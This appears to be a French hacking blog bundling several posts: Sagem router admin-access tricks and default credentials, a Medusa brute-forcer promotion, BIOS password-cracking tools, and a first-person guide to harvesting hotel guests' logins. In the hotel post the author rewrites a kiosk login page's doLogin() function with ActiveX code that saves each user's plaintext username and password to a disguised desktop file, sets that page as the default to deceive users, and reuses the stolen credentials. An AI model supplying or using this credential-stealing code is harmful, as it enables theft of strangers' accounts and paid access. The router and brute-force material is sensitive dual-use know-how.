Le Login et mot de passe fournis par l’opérateur pour l’interface web et la connexion Telnet ont un minimum de privilège , ainsi les actions que les utilisateurs peuvent exécuter sont archaïques et insuffisantes .

Les routeurs  sagem F@st 3464 / 3304-V1 et le 3504 / 3304-V2 ont un mot de passe root Static Pre-configuré . cet outil vous permet de générer ce mot de passe a partir de l’adresse MAC de ces routeurs : Générer le mot de passe Root des routeurs sagem F@st 3464 / 3304-V1 et le 3504 / 3304-V2

TELNET 192.168.1.1 . Toutes le commandes telnet du routeur se trouvent sur ce document telnet-sagem.pdf

Maroc Telecom propose son dernier routeur SAGEM F@ST3304-V2 qui est en vérité le Sagem F@stTM 3504 avec une technologie et du matériels qui date de 2006 .

Menara_pass

Coté sécurité Maroc Telecom propose le routeur bridé avec un seul Login et mot de passe par défaut Menara/Menara sans interface pour le changer, Voici une petite astuce pour accéder a l’interface de gestion des utilisateurs.

1 : Taper dans le navigateur l’adresse du routeur (par default) 192.168.1.1

2 : Entrer le couple login Menara et mot de passe Menara

3 : Taper dans la bare d’adresse du navigateur sur la même page : javascript:mimic_button('navigator: 100..')

4 : L’interface d’administration des utilisateurs apparait
5 : Pour changer le mot de passe du compte Menara cliquer sur la petite icône avec le crayon sur la même ligne du nom d’utilisateur.

6 : Cliquer sur Changer le mot de passe

7 : Entrer l’ancien mot de passe Menara puis le nouveau mot de passe 2 fois puis Appliquer.

8 : Félicitation votre mot de passe a été changé.

Dans un prochain article je vais vous montrer comment accéder par telnet au shell du routeur en mode root .

Medusa est un brute forcer de mot de passe rapide, massivement parallèle, pour les services réseau. Certaines des principales caractéristiques de Médusa sont:

Tests à base de Thread parallèle: Brute-force testing can be performed against multiple hosts, users or passwords concurrently.Les tests de Brute-force peuvent être effectués contre des hôtes multiples, avec des utilisateurs et des mots de passe simultanément.

Flexibilité des entrées utilisateur: Les l’information (hôte / utilisateur / mot de passe) peuvent être spécifiées de plusieurs façons. Par exemple, chaque élément peut être soit une entrée unique ou un fichier contenant des entrées multiples.

Conception modulaire: Chaque module de service existe en tant qu’entité indépendante dans un fichier .Mod. Cela signifie que des modifications ne sont pasnécessaires à l’application centrale pour étendre la liste des services de brute force.

Actuellement les services suivants sont supportés :
• AFP
• CVS
• FTP
• HTTP
• IMAP
• MS-SQL
• MySQL
• NCP (NetWare)
• NNTP
• PcAnywhere
• POP3
• PostgreSQL
• rexec
• rlogin
• rsh
• SMB
• SMTP (AUTH/VRFY)
• SNMP
• SSHv2
• SVN
• Telnet
• VmAuthd
• VNC

Bien que Médusa a été conçu pour le même but que THC-Hydra , il existe plusieurs différences importantes – vous pouvez voir une brève comparaison .

Vous pouvez télécharger Medusa v1.5 ici:  medusa-1.5.tar.gz

L’hôtel ibis Meknès met a la disposition des utilisateurs un PC de bureau avec internet explorer pour un tarif de 60 DH pour une demie heure et 100 DH l’heur qui est extrêmement chère quand l’accès a l information et a l’internet est nécessaire et indispensable.

Si vous n’avez pas de pc pour snifer les login et mot de passe qui sont dans ce cas précis cryptée a l’aide d un script JavaScript très utile pour crypter le mot de passe avant de l’envoyer . Il dispose de 4 fonction :

function hexMD5 (str)
function hexMD5w(str)
function b64MD5 (str)
function b64MD5w(str)
function calcMD5(str)

vous pouvez le télécharger sur : http://pajhome.org.uk/crypt/md5/3.0/md5-2.2alpha.js

L’idée est de stocker les informations d’authentification sur le pc lui-même et les récupérer âpres la connexion des utilisateurs qui son munie d un login et un mot de passe d’Access.

Comme je n ai pas d’outils à installer comme un Key loger j’ai décidé de

1. Enregistrer la page d’authentifications html
2. Modifier l’action Script du formulaire pour enregistrer les mots de passes avant de s’authentifier
3. Lancer la page comme page par défaut pour tromper les utilisateurs

Pour coder un script qui enregistre les données de la page web sur le bureau il faut activer les contrôle ActiveX sous internet explorer outil > option internet > sécurité > Personnaliser le niveau>Contrôle ACtiveX

Cette action est très déconseillée pour l’utilisation normal mais nécessaire pour exécuter a bien cette attaque.

Sur la Page d authentification on retrouve le code :

function doLogin() {
document.sendin.username.value = document.login.username.value;
document.sendin.password.value = hexMD5(‘\155′ + document.login.password.value + ‘\010\147\337\136\064\226\371\272\364\277\015\362\110\360\173\037′);
document.sendin.submit();
}

Ce qui permet de coder le mot de passe avant de l’envoyer dans notre cas on va récupérer le mot de passe dans le fichier avant de le crypter donc on ajoute le code suivant avant l’envoi des informations

function doLogin() {

var fso=new ActiveXObject(« Scripting.FileSystemObject »); //Création du Système de fichier.
var otf=fso.OpenTextFile(« Presentation.txt », 8 ,true); //Ouverture du fichier « Presentation.txt »  //qu’on a cree sur le bureau pour ne pas attirer l’attention
otf.WriteLine(document.login.username.value); //Ecriture de la ligne « Login ».
otf.WriteLine(document.login.password.value); //Ecriture de la ligne « pass ».
otf.Close(); //Fermeture du fichier  » Presentation.txt »
document.sendin.username.value = document.login.username.value;
document.sendin.password.value = hexMD5(‘\155′ + document.login.password.value + ‘\010\147\337\136\064\226\371\272\364\277\015\362\110\360\173\037′);
document.sendin.submit();
}

Après l’authentification on récupère le fichier et on test les Combinaison ou il reste encore du temps de connexion.

En ce qui me concerne il me reste 45 minutes

La manière la plus commune que la plupart d’entre nous Connaissent et de réinitialiser le mot de passe BIOS et d »elliminer la pile de la carte mère une 10 enne de minute  .Une autre méthode consiste à réinitialiser le cavalier du reset CMOS sur la carte mère elle-même. Les deux des 2 méthodes mentionnés marche parce que la plupart des Carte mère utilisent une batterie pour se souvenir des paramètres BIOS / CMOS  dans la puce des cartes mères PROM. Ainsi, en coupant l’alimentation de la batterie,les paramètres du BIOS / CMOS seront effacées.

Si, pour une raison quelconque vous ne parvenez pas à réinitialiser le BIOS de l’ordinateur , voici quelques outils que vous pouvez utiliser pour effacer le mot de passe BIOS .

1-CmosPwd par CGSecurity

CmosPwd déchiffre le mot de passe stockés dans CMOS utilisée pour l’accès au BIOS.
Il marche pour les Bios Suivant: ACER/IBM BIOS, AMI BIOS, AMI WinBIOS 2.5, Award 4.5x/4.6x/6.0, Compaq (1992), Compaq (New version), IBM (PS/2, Activa, Thinkpad), Packard Bell, Phoenix 1.00.09.AC0 (1994), a486 1.03, 1.04, 1.10 A03, 4.05 rev 1.02.943, 4.06 rev 1.13.1107, Phoenix 4 release 6 (User), Gateway Solo – Phoenix 4.0 release 6, Toshiba and Zenith AMI. Télécharger CmosPwd 5,0

2-!Bios Par eleventh alliance

! BIOS est un outil développé à l’origine pour utiliser la Force brutale afin de supprimer les mots de passe de BIOS. Depuis , son développement a été fortement étendu.
! BIOS peut déchiffrer les mots de passe utilisés dans la plupart des BIOS communs (y compris les différents BIOS /versions de IBM, American Megatrends Inc, Award et Phoenix).

Un peu dangereux et peut révéler des Résultat inattendues ou indésirables. Télécharger !Bios

3-CMOS PC Cleaner

PC CMOS Cleaner est un outil facile à utiliser.il permet de récupérer, supprimer, décoder et afficher les mots de passe stockés dans le BIOS quelle que soit la marque des  BIOS( AWARD, AMI, Compaq, Phoenix, Samsung, IBM, Compaq, DTK, Thinkpad, Sony, Toshiba ).c’est un CD bootable qui tourne sur les ordinateurs x86 et x86_64 . Télécharger PC CMOS Cleaner

En cas de lien mort laisser un commentaire .